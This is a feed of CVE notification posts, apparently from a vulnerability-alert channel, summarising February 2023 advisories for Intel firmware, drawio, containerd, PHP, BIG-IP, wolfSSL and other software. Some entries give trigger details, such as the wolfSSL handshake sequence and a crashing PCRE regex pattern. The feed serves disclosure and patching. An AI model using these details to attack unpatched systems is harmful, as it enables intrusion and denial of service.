🚨 CVE-2022-26343Improper access control in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-02-16 22:29:49 |
🚨 CVE-2022-26345Uncontrolled search path element in the Intel(R) oneAPI Toolkit OpenMP before version 2022.1 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-02-16 22:29:48 |
🚨 CVE-2022-26837Improper input validation in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-02-16 22:29:47 |
🚨 CVE-2022-30531Out-of-bounds read in the Intel(R) Iris(R) Xe MAX drivers for Windows before version 100.0.5.1474 may allow a privileged user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-02-16 22:29:43 |
🚨 CVE-2022-36398Uncontrolled search path in the Intel(R) Battery Life Diagnostic Tool software before version 2.2.0 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-02-16 22:29:42 |
🚨 CVE-2022-36278Insufficient control flow management in the Intel(R) Battery Life Diagnostic Tool software before version 2.2.0 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-02-16 22:29:41 |
🚨 CVE-2022-21216Insufficient granularity of access control in out-of-band management in some Intel(R) Atom and Intel Xeon Scalable Processors may allow a privileged user to potentially enable escalation of privilege via adjacent network access.🎖@cveNotify |
|
| 2023-02-16 22:29:37 |
🚨 CVE-2022-36348Active debug code in some Intel (R) SPS firmware before version SPS_E5_04.04.04.300.0 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-02-16 22:29:36 |
🚨 CVE-2022-25987Improper handling of Unicode encoding in source code to be compiled by the Intel(R) C++ Compiler Classic before version 2021.6 for Intel(R) oneAPI Toolkits before version 2022.2 may allow an unauthenticated user to potentially enable escalation of privilege via network access.🎖@cveNotify |
|
| 2023-02-16 19:30:21 |
🚨 CVE-2023-24807Undici is an HTTP/1.1 client for Node.js. Prior to version 5.19.1, the `Headers.set()` and `Headers.append()` methods are vulnerable to Regular Expression Denial of Service (ReDoS) attacks when untrusted values are passed into the functions. This is due to the inefficient regular expression used to normalize the values in the `headerValueNormalize()` utility function. This vulnerability was patched in v5.19.1. No known workarounds are available.🎖@cveNotify |
|
| 2023-02-16 19:30:19 |
🚨 CVE-2023-23936Undici is an HTTP/1.1 client for Node.js. Starting with version 2.0.0 and prior to version 5.19.1, the undici library does not protect `host` HTTP header from CRLF injection vulnerabilities. This issue is patched in Undici v5.19.1. As a workaround, sanitize the `headers.host` string before passing to undici.🎖@cveNotify |
|
| 2023-02-16 19:30:17 |
🚨 CVE-2023-24483A vulnerability has been identified that, if exploited, could result in a local user elevating their privilege level to NT AUTHORITY\SYSTEM on a Citrix Virtual Apps and Desktops Windows VDA.🎖@cveNotify |
|
| 2023-02-16 19:30:15 |
🚨 CVE-2015-10076A vulnerability was found in dimtion Shaarlier up to 1.2.2. It has been declared as critical. Affected by this vulnerability is the function createTag of the file app/src/main/java/com/dimtion/shaarlier/TagsSource.java of the component Tag Handler. The manipulation leads to sql injection. Upgrading to version 1.2.3 is able to address this issue. The name of the patch is 3d1d9b239d9b3cd87e8bed45a0f02da583ad371e. It is recommended to upgrade the affected component. The identifier VDB-220453 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-16 19:30:13 |
🚨 CVE-2022-1774Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.0.7.🎖@cveNotify |
|
| 2023-02-16 19:30:11 |
🚨 CVE-2022-1767Server-Side Request Forgery (SSRF) in GitHub repository jgraph/drawio prior to 18.0.7.🎖@cveNotify |
|
| 2023-02-16 19:30:08 |
🚨 CVE-2022-1727Improper Input Validation in GitHub repository jgraph/drawio prior to 18.0.6.🎖@cveNotify |
|
| 2023-02-16 19:30:06 |
🚨 CVE-2022-1713SSRF on /proxy in GitHub repository jgraph/drawio prior to 18.0.4. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.🎖@cveNotify |
|
| 2023-02-16 19:30:04 |
🚨 CVE-2022-1721Path Traversal in WellKnownServlet in GitHub repository jgraph/drawio prior to 18.0.5. Read local files of the web application.🎖@cveNotify |
|
| 2023-02-16 19:30:02 |
🚨 CVE-2022-1722SSRF in editor's proxy via IPv6 link-local address in GitHub repository jgraph/drawio prior to 18.0.5. SSRF to internal link-local IPv6 addresses🎖@cveNotify |
|
| 2023-02-16 19:30:00 |
🚨 CVE-2022-3568The ImageMagick Engine plugin for WordPress is vulnerable to deserialization of untrusted input via the 'cli_path' parameter in versions up to, and including 1.7.5. This makes it possible for unauthenticated users to call files using a PHAR wrapper, granted they can trick a site administrator into performing an action such as clicking on a link, that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present. It also requires that the attacker is successful in uploading a file with the serialized payload.🎖@cveNotify |
|
| 2023-02-16 19:29:58 |
🚨 CVE-2023-0771SQL Injection in GitHub repository ampache/ampache prior to 5.5.7,develop.🎖@cveNotify |
|
| 2023-02-16 19:29:56 |
🚨 CVE-2022-45190An issue was discovered on Microchip RN4870 1.43 devices. An attacker within BLE radio range can bypass passkey entry in the legacy pairing of the device.🎖@cveNotify |
|
| 2023-02-16 19:29:54 |
🚨 CVE-2022-40480Nordic Semiconductor, Microchip Technology NRF5340-DK DT100112 was discovered to contain an issue which allows attackers to cause a Denial of Service (DoS) via a crafted ConReq packet.🎖@cveNotify |
|
| 2023-02-16 19:29:53 |
🚨 CVE-2023-24828Onedev is a self-hosted Git Server with CI/CD and Kanban. In versions prior to 7.9.12 the algorithm used to generate access token and password reset keys was not cryptographically secure. Existing normal users (or everyone if it allows self-registration) may exploit this to elevate privilege to obtain administrator permission. This issue is has been addressed in version 7.9.12. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-02-16 19:29:51 |
🚨 CVE-2023-23286Cross Site Scripting (XSS) vulnerability in Provide server 14.4 allows attackers to execute arbitrary code through the server-log via username field from the login form.🎖@cveNotify |
|
| 2023-02-16 19:29:49 |
🚨 CVE-2022-47418LogicalDOC Enterprise and Community Edition (CE) are vulnerable to a stored (persistent, or "Type II") cross-site scripting (XSS) condition in the document version comments.🎖@cveNotify |
|
| 2023-02-16 19:29:47 |
🚨 CVE-2022-47417LogicalDOC Enterprise and Community Edition (CE) are vulnerable to a stored (persistent, or "Type II") cross-site scripting (XSS) condition in the document file name.🎖@cveNotify |
|
| 2023-02-16 19:29:45 |
🚨 CVE-2018-7935There is a vulnerability in 21.328.01.00.00 version of the E5573Cs-322. Remote attackers could exploit this vulnerability to make the network where the E5573Cs-322 is running temporarily unavailable.🎖@cveNotify |
|
| 2023-02-16 19:29:43 |
🚨 CVE-2022-47416LogicalDOC Enterprise is vulnerable to a stored (persistent, or "Type II") cross-site scripting (XSS) condition in the in-app chat system.🎖@cveNotify |
|
| 2023-02-16 17:30:14 |
🚨 CVE-2022-48308It was discovered that the sls-logging was not verifying hostnames in TLS certificates due to a misuse of the javax.net.ssl.SSLSocketFactory API. A malicious attacker in a privileged network position could abuse this to perform a man-in-the-middle attack. A successful man-in-the-middle attack would allow them to intercept, read, or modify network communications to and from the affected service.🎖@cveNotify |
|
| 2023-02-16 17:30:13 |
🚨 CVE-2023-23558In Eternal Terminal 6.2.1, TelemetryService uses fixed paths in /tmp. For example, a local attacker can create /tmp/.sentry-native-etserver with mode 0777 before the etserver process is started. The attacker can choose to read sensitive information from that file, or modify the information in that file.🎖@cveNotify |
|
| 2023-02-16 17:30:12 |
🚨 CVE-2023-23926APOC (Awesome Procedures on Cypher) is an add-on library for Neo4j. An XML External Entity (XXE) vulnerability found in the apoc.import.graphml procedure of APOC core plugin prior to version 5.5.0 in Neo4j graph database. XML External Entity (XXE) injection occurs when the XML parser allows external entities to be resolved. The XML parser used by the apoc.import.graphml procedure was not configured in a secure way and therefore allowed this. External entities can be used to read local files, send HTTP requests, and perform denial-of-service attacks on the application. Abusing the XXE vulnerability enabled assessors to read local files remotely. Although with the level of privileges assessors had this was limited to one-line files. With the ability to write to the database, any file could have been read. Additionally, assessors noted, with local testing, the server could be crashed by passing in improperly formatted XML. The minimum version containing a patch for this vulnerability is 5.5.0. Those who cannot upgrade the library can control the allowlist of the procedures that can be used in your system.🎖@cveNotify |
|
| 2023-02-16 17:30:11 |
🚨 CVE-2023-24814TYPO3 is a free and open source Content Management Framework released under the GNU General Public License. In affected versions the TYPO3 core component `GeneralUtility::getIndpEnv()` uses the unfiltered server environment variable `PATH_INFO`, which allows attackers to inject malicious content. In combination with the TypoScript setting `config.absRefPrefix=auto`, attackers can inject malicious HTML code to pages that have not been rendered and cached, yet. As a result, injected values would be cached and delivered to other website visitors (persisted cross-site scripting). Individual code which relies on the resolved value of `GeneralUtility::getIndpEnv('SCRIPT_NAME')` and corresponding usages (as shown below) are vulnerable as well. Additional investigations confirmed that at least Apache web server deployments using CGI (FPM, FCGI/FastCGI, and similar) are affected. However, there still might be the risk that other scenarios like nginx, IIS, or Apache/mod_php are vulnerable. The usage of server environment variable `PATH_INFO` has been removed from corresponding processings in `GeneralUtility::getIndpEnv()`. Besides that, the public property `TypoScriptFrontendController::$absRefPrefix` is encoded for both being used as a URI component and for being used as a prefix in an HTML context. This mitigates the cross-site scripting vulnerability. Users are advised to update to TYPO3 versions 8.7.51 ELTS, 9.5.40 ELTS, 10.4.35 LTS, 11.5.23 LTS and 12.2.0 which fix this problem. For users who are unable to patch in a timely manner the TypoScript setting `config.absRefPrefix` should at least be set to a static path value, instead of using auto - e.g. `config.absRefPrefix=/`. This workaround **does not fix all aspects of the vulnerability**, and is just considered to be an intermediate mitigation to the most prominent manifestation.🎖@cveNotify |
|
| 2023-02-16 17:30:09 |
🚨 CVE-2020-24307** DISPUTED ** An issue in mRemoteNG v1.76.20 allows attackers to escalate privileges via a crafted executable file. NOTE: third parties were unable to reproduce any scenario in which the claimed access of BUILTIN\Users:(M) is present.🎖@cveNotify |
|
| 2023-02-16 17:30:08 |
🚨 CVE-2023-22735Zulip is an open-source team collaboration tool. In versions of zulip prior to commit `2f6c5a8` but after commit `04cf68b` users could upload files with arbitrary `Content-Type` which would be served from the Zulip hostname with `Content-Disposition: inline` and no `Content-Security-Policy` header, allowing them to trick other users into executing arbitrary Javascript in the context of the Zulip application. Among other things, this enables session theft. Only deployments which use the S3 storage (not the local-disk storage) are affected, and only deployments which deployed commit 04cf68b45ebb5c03247a0d6453e35ffc175d55da, which has only been in `main`, not any numbered release. Users affected should upgrade from main again to deploy this fix. Switching from S3 storage to the local-disk storage would nominally mitigate this, but is likely more involved than upgrading to the latest `main` which addresses the issue.🎖@cveNotify |
|
| 2023-02-16 17:30:07 |
🚨 CVE-2023-22580Due to improper input filtering in the sequalize js library, can malicious queries lead to sensitive information disclosure.🎖@cveNotify |
|
| 2023-02-16 17:30:06 |
🚨 CVE-2023-24238TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the city parameter at setting/delStaticDhcpRules.🎖@cveNotify |
|
| 2023-02-16 17:30:05 |
🚨 CVE-2023-25153containerd is an open source container runtime. Before versions 1.6.18 and 1.5.18, when importing an OCI image, there was no limit on the number of bytes read for certain files. A maliciously crafted image with a large file where a limit was not applied could cause a denial of service. This bug has been fixed in containerd 1.6.18 and 1.5.18. Users should update to these versions to resolve the issue. As a workaround, ensure that only trusted images are used and that only trusted users have permissions to import images.🎖@cveNotify |
|
| 2023-02-16 17:30:04 |
🚨 CVE-2023-25173containerd is an open source container runtime. A bug was found in containerd prior to versions 1.6.18 and 1.5.18 where supplementary groups are not set up properly inside a container. If an attacker has direct access to a container and manipulates their supplementary group access, they may be able to use supplementary group access to bypass primary group restrictions in some cases, potentially gaining access to sensitive information or gaining the ability to execute code in that container. Downstream applications that use the containerd client library may be affected as well. This bug has been fixed in containerd v1.6.18 and v.1.5.18. Users should update to these versions and recreate containers to resolve this issue. Users who rely on a downstream application that uses containerd's client library should check that application for a separate advisory and instructions. As a workaround, ensure that the `"USER $USERNAME"` Dockerfile instruction is not used. Instead, set the container entrypoint to a value similar to `ENTRYPOINT ["su", "-", "user"]` to allow `su` to properly set up supplementary groups.🎖@cveNotify |
|
| 2023-02-16 17:30:02 |
🚨 CVE-2022-3843In WAGO Unmanaged Switch (852-111/000-001) in firmware version 01 an undocumented configuration interface without authorization allows an remote attacker to read system information and configure a limited set of parameters.🎖@cveNotify |
|
| 2023-02-16 17:30:01 |
🚨 CVE-2023-22578Due to improper artibute filtering in the sequalize js library, can a attacker peform SQL injections.🎖@cveNotify |
|
| 2023-02-16 17:30:00 |
🚨 CVE-2023-22579Due to improper parameter filtering in the sequalize js library, can a attacker peform injection.🎖@cveNotify |
|
| 2023-02-16 17:29:59 |
🚨 CVE-2023-24236TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the province parameter at setting/delStaticDhcpRules.🎖@cveNotify |
|
| 2023-02-16 17:29:58 |
🚨 CVE-2022-38731Qaelum DOSE 18.08 through 21.1 before 21.2 allows Directory Traversal via the loadimages name parameter. It allows a user to specify an arbitrary location on the server's filesystem from which to load an image. (Only images are displayed to the attacker. All other files are loaded but not displayed.) The Content-Type response header reflects the actual content type of the file being requested. This allows an attacker to enumerate files on the local system. Additionally, remote resources can be requested via a UNC path, allowing an attacker to coerce authentication out from the server to the attackers machine.🎖@cveNotify |
|
| 2023-02-16 17:29:57 |
🚨 CVE-2022-43969Ricoh mp_c4504ex devices with firmware 1.06 mishandle credentials.🎖@cveNotify |
|
| 2023-02-16 17:29:56 |
🚨 CVE-2022-1970keycloak 18.0.0: open redirect in auth endpoint via the redirect_uri parameter.🎖@cveNotify |
|
| 2023-02-16 17:29:55 |
🚨 CVE-2023-0704Insufficient policy enforcement in DevTools in Google Chrome prior to 110.0.5481.77 allowed a remote attacker to bypass same origin policy and proxy settings via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-02-16 17:29:54 |
🚨 CVE-2022-47648Bosch Security Systems B420 firmware 02.02.0001 employs IP based authorization in its authentication mechanism, allowing attackers to access the device as long as they are on the same network as a legitimate user.🎖@cveNotify |
|
| 2023-02-16 17:29:53 |
🚨 CVE-2023-0703Type confusion in DevTools in Google Chrome prior to 110.0.5481.77 allowed a remote attacker who convinced a user to engage in specific UI interactions to potentially exploit heap corruption via UI interactions. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-02-16 16:29:52 |
🚨 CVE-2015-8386PCRE before 8.38 mishandles the interaction of lookbehind assertions and mutually recursive subpatterns, which allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror.🎖@cveNotify |
|
| 2023-02-16 16:29:51 |
🚨 CVE-2015-8390PCRE before 8.38 mishandles the [: and \\ substrings in character classes, which allows remote attackers to cause a denial of service (uninitialized memory read) or possibly have unspecified other impact via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror.🎖@cveNotify |
|
| 2023-02-16 16:29:50 |
🚨 CVE-2015-8389PCRE before 8.38 mishandles the /(?:|a|){100}x/ pattern and related patterns, which allows remote attackers to cause a denial of service (infinite recursion) or possibly have unspecified other impact via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror.🎖@cveNotify |
|
| 2023-02-16 12:29:48 |
🚨 CVE-2023-0860Improper Restriction of Excessive Authentication Attempts in GitHub repository modoboa/modoboa-installer prior to 2.0.4.🎖@cveNotify |
|
| 2023-02-16 12:29:46 |
🚨 CVE-2023-0862The NetModule NSRW web administration interface is vulnerable to path traversals, which could lead to arbitrary file uploads and deletion. By uploading malicious files to the web root directory, authenticated users could gain remote command execution with elevated privileges. This issue affects NSRW: from 4.3.0.0 before 4.3.0.119, from 4.4.0.0 before 4.4.0.118, from 4.6.0.0 before 4.6.0.105, from 4.7.0.0 before 4.7.0.103. The issue affects NSRW packaged by Phoenix Contact routers: from 4.6.72.0 before 4.6.72.101, from 4.6.73.0 before 4.6.73.101.🎖@cveNotify |
|
| 2023-02-16 12:29:44 |
🚨 CVE-2023-0861NetModule NSRW web administration interface executes an OS command constructed with unsanitized user input. A successful exploit could allow an authenticated user to execute arbitrary commands with elevated privileges. This issue affects NSRW: from 4.3.0.0 before 4.3.0.119, from 4.4.0.0 before 4.4.0.118, from 4.6.0.0 before 4.6.0.105, from 4.7.0.0 before 4.7.0.103. The issue affects NSRW packaged by Phoenix Contact routers: from 4.6.72.0 before 4.6.72.101, from 4.6.73.0 before 4.6.73.101.🎖@cveNotify |
|
| 2023-02-16 12:29:43 |
🚨 CVE-2023-0568In PHP 8.0.X before 8.0.28, 8.1.X before 8.1.16 and 8.2.X before 8.2.3, core path resolution function allocate buffer one byte too small. When resolving paths with lengths close to system MAXPATHLEN setting, this may lead to the byte after the allocated buffer being overwritten with NUL value, which might lead to unauthorized data access or modification.🎖@cveNotify |
|
| 2023-02-16 12:29:42 |
🚨 CVE-2023-0662In PHP 8.0.X before 8.0.28, 8.1.X before 8.1.16 and 8.2.X before 8.2.3, excessive number of parts in HTTP form upload can cause high resource consumption and excessive number of log entries. This can cause denial of service on the affected server by exhausting CPU resources or disk space.🎖@cveNotify |
|
| 2023-02-16 07:30:21 |
🚨 CVE-2022-21637Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-02-16 07:30:19 |
🚨 CVE-2022-21625Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.30 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-02-16 07:30:18 |
🚨 CVE-2022-21632Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-02-16 07:30:16 |
🚨 CVE-2022-21633Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-02-16 07:30:13 |
🚨 CVE-2020-35568An issue was discovered in MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual in all versions through v2.11.2. An incomplete filter applied to a database response allows an authenticated attacker to gain non-public information about other users and devices in the account.🎖@cveNotify |
|
| 2023-02-16 07:30:11 |
🚨 CVE-2020-35570An issue was discovered in MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual through 2.11.2. An unauthenticated attacker is able to access files (that should have been restricted) via forceful browsing.🎖@cveNotify |
|
| 2023-02-16 07:30:10 |
🚨 CVE-2020-35561An issue was discovered MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual in all versions through v2.11.2. There is an SSRF in the HA module allowing an unauthenticated attacker to scan for open ports.🎖@cveNotify |
|
| 2023-02-16 07:30:08 |
🚨 CVE-2020-35566An issue was discovered in MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual in all versions through v2.11.2. An attacker can read arbitrary JSON files via Local File Inclusion.🎖@cveNotify |
|
| 2023-02-16 07:30:06 |
🚨 CVE-2020-35558An issue was discovered in MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual through 2.11.2. There is an SSRF in the in the MySQL access check, allowing an attacker to scan for open ports and gain some information about possible credentials.🎖@cveNotify |
|
| 2023-02-16 07:30:05 |
🚨 CVE-2019-6633On BIG-IP 14.1.0-14.1.0.5, 14.0.0-14.0.0.4, 13.0.0-13.1.1.4, 12.1.0-12.1.4.1, and 11.5.1-11.6.4, when the BIG-IP system is licensed with Appliance mode, user accounts with Administrator and Resource Administrator roles can bypass Appliance mode restrictions.🎖@cveNotify |
|
| 2023-02-16 07:30:03 |
🚨 CVE-2019-6639On BIG-IP (AFM, PEM) 14.1.0-14.1.0.5, 14.0.0-14.0.0.4, 13.0.0-13.1.1.4, 12.1.0-12.1.4, 11.6.1-11.6.3.4, and 11.5.1-11.5.8, an undisclosed TMUI pages for AFM and PEM Subscriber management are vulnerable to a stored cross-site scripting (XSS) issue. This is a control plane issue only and is not accessible from the data plane. The attack requires a malicious resource administrator to store the XSS.🎖@cveNotify |
|
| 2023-02-16 07:30:01 |
🚨 CVE-2019-6635On BIG-IP 14.1.0-14.1.0.5, 14.0.0-14.0.0.4, 13.0.0-13.1.1.4, 12.1.0-12.1.4, 11.6.1-11.6.3.4, and 11.5.1-11.5.8, when the BIG-IP system is licensed for Appliance mode, a user with either the Administrator or the Resource Administrator role can bypass Appliance mode restrictions.🎖@cveNotify |
|
| 2023-02-16 07:30:00 |
🚨 CVE-2019-6631On BIG-IP 11.5.1-11.6.4, iRules performing HTTP header manipulation may cause an interruption to service when processing traffic handled by a Virtual Server with an associated HTTP profile, in specific circumstances, when the requests do not strictly conform to RFCs.🎖@cveNotify |
|
| 2023-02-16 07:29:57 |
🚨 CVE-2019-6629On BIG-IP 14.1.0-14.1.0.5, undisclosed SSL traffic to a virtual server configured with a Client SSL profile may cause TMM to fail and restart. The Client SSL profile must have session tickets enabled and use DHE cipher suites to be affected. This only impacts the data plane, there is no impact to the control plane.🎖@cveNotify |
|
| 2023-02-16 07:29:56 |
🚨 CVE-2019-6623On BIG-IP 14.1.0-14.1.0.5, 14.0.0-14.0.0.4, 13.0.0-13.1.1.4, and 12.1.0-12.1.4, undisclosed traffic sent to BIG-IP iSession virtual server may cause the Traffic Management Microkernel (TMM) to restart, resulting in a Denial-of-Service (DoS).🎖@cveNotify |
|
| 2023-02-16 07:29:54 |
🚨 CVE-2019-6619On BIG-IP 14.0.0-14.1.0.1, 13.0.0-13.1.1.4, and 12.1.0-12.1.4, the Traffic Management Microkernel (TMM) may restart when a virtual server has an HTTP/2 profile with Application Layer Protocol Negotiation (ALPN) enabled and it processes traffic where the ALPN extension size is zero.🎖@cveNotify |
|
| 2023-02-16 07:29:52 |
🚨 CVE-2019-6600In BIG-IP 14.0.0-14.0.0.2, 13.0.0-13.1.1.3, 12.1.0-12.1.3.7, 11.6.1-11.6.3.2, or 11.5.1-11.5.8, when remote authentication is enabled for administrative users and all external users are granted the "guest" role, unsanitized values can be reflected to the client via the login page. This can lead to a cross-site scripting attack against unauthenticated clients.🎖@cveNotify |
|
| 2023-02-16 07:29:51 |
🚨 CVE-2019-6616On BIG-IP 14.0.0-14.1.0.1, 13.0.0-13.1.1.4, 12.1.0-12.1.4, 11.6.1-11.6.3.4, and 11.5.2-11.5.8, administrative users with TMSH access can overwrite critical system files on BIG-IP which can result in bypass of whitelist / blacklist restrictions enforced by appliance mode.🎖@cveNotify |
|
| 2023-02-16 07:29:50 |
🚨 CVE-2019-6617On BIG-IP 14.0.0-14.1.0.1, 13.0.0-13.1.1.4, 12.1.0-12.1.4, 11.6.1-11.6.3.4, and 11.5.2-11.5.8, a user with the Resource Administrator role is able to overwrite sensitive low-level files (such as /etc/passwd) using SFTP to modify user permissions, without Advanced Shell access. This is contrary to our definition for the Resource Administrator (RA) role restrictions.🎖@cveNotify |
|
| 2023-02-16 07:29:47 |
🚨 CVE-2021-36411An issue has been found in libde265 v1.0.8 due to incorrect access control. A SEGV caused by a READ memory access in function derive_boundaryStrength of deblock.cc has occurred. The vulnerability causes a segmentation fault and application crash, which leads to remote denial of service.🎖@cveNotify |
|
| 2023-02-16 02:30:01 |
🚨 CVE-2022-37783All Craft CMS versions between 3.0.0 and 3.7.32 disclose password hashes of users who authenticate using their E-Mail address or username in Anti-CSRF-Tokens. Craft CMS uses a cookie called CRAFT_CSRF_TOKEN and a HTML hidden field called CRAFT_CSRF_TOKEN to avoid Cross Site Request Forgery attacks. The CRAFT_CSRF_TOKEN cookie discloses the password hash in without encoding it whereas the corresponding HTML hidden field discloses the users' password hash in a masked manner, which can be decoded by using public functions of the YII framework.🎖@cveNotify |
|
| 2023-02-15 23:30:32 |
🚨 CVE-2020-21120SQL Injection vulnerability in file home\controls\cart.class.php in UQCMS 2.1.3, allows attackers execute arbitrary commands via the cookie_cart parameter to /index.php/cart/num.🎖@cveNotify |
|
| 2023-02-15 23:30:30 |
🚨 CVE-2021-33304Double Free vulnerability in virtualsquare picoTCP v1.7.0 and picoTCP-NG v2.1 in modules/pico_fragments.c in function pico_fragments_reassemble, allows attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-02-15 23:30:29 |
🚨 CVE-2021-33396Cross Site Request Forgery (CSRF) vulnerability in baijiacms 4.1.4, allows attackers to change the password or other information of an arbitrary account via index.php.🎖@cveNotify |
|
| 2023-02-15 23:30:27 |
🚨 CVE-2021-33925SQL Injection vulnerability in nitinparashar30 cms-corephp through commit bdabe52ef282846823bda102728a35506d0ec8f9 (May 19, 2021) allows unauthenticated attackers to gain escilated privledges via a crafted login.🎖@cveNotify |
|
| 2023-02-15 23:30:26 |
🚨 CVE-2021-34117SQL Injection vulnerability in SEO Panel 4.9.0 in api/user.api.php in function getUserName in the username parameter, allows attackers to gain sensitive information.🎖@cveNotify |
|
| 2023-02-15 23:30:24 |
🚨 CVE-2022-38867SQL Injection vulnerability in rttys versions 4.0.0, 4.0.1, and 4.0.2 in api.go, allows attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-02-15 23:30:23 |
🚨 CVE-2022-38868SQL Injection vulnerability in Ehoney version 2.0.0 in models/protocol.go and models/images.go, allows attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-02-15 23:30:21 |
🚨 CVE-2022-38935An issue was discovered in NiterForum version 2.5.0-beta in /src/main/java/cn/niter/forum/api/SsoApi.java and /src/main/java/cn/niter/forum/controller/AdminController.java, allows attackers to gain escalated privileges.🎖@cveNotify |
|
| 2023-02-15 23:30:20 |
🚨 CVE-2022-40016Use After Free (UAF) vulnerability in ireader media-server before commit 3e0f63f1d3553f75c7d4eb32fa7c7a1976a9ff84 in librtmp, allows attackers to cause a denial of service.🎖@cveNotify |
|
| 2023-02-15 23:30:18 |
🚨 CVE-2023-0848A vulnerability was found in Netgear WNDR3700v2 1.0.1.14. It has been rated as problematic. This issue affects some unknown processing of the component Web Management Interface. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221147.🎖@cveNotify |
|
| 2023-02-15 23:30:17 |
🚨 CVE-2023-0849A vulnerability has been found in Netgear WNDR3700v2 1.0.1.14 and classified as critical. This vulnerability affects unknown code of the component Web Interface. The manipulation leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221152.🎖@cveNotify |
|
| 2023-02-15 23:30:15 |
🚨 CVE-2023-0850A vulnerability was found in Netgear WNDR3700v2 1.0.1.14 and classified as problematic. This issue affects some unknown processing of the component Web Interface. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221153 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-15 23:30:14 |
🚨 CVE-2022-42905In wolfSSL before 5.5.2, if callback functions are enabled (via the WOLFSSL_CALLBACKS flag), then a malicious TLS 1.3 client or network attacker can trigger a buffer over-read on the heap of 5 bytes. (WOLFSSL_CALLBACKS is only intended for debugging.)🎖@cveNotify |
|
| 2023-02-15 23:30:12 |
🚨 CVE-2022-39173In wolfSSL before 5.5.1, malicious clients can cause a buffer overflow during a TLS 1.3 handshake. This occurs when an attacker supposedly resumes a previous TLS session. During the resumption Client Hello a Hello Retry Request must be triggered. Both Client Hellos are required to contain a list of duplicate cipher suites to trigger the buffer overflow. In total, two Client Hellos have to be sent: one in the resumed session, and a second one as a response to a Hello Retry Request message.🎖@cveNotify |
|
| 2023-02-15 23:30:11 |
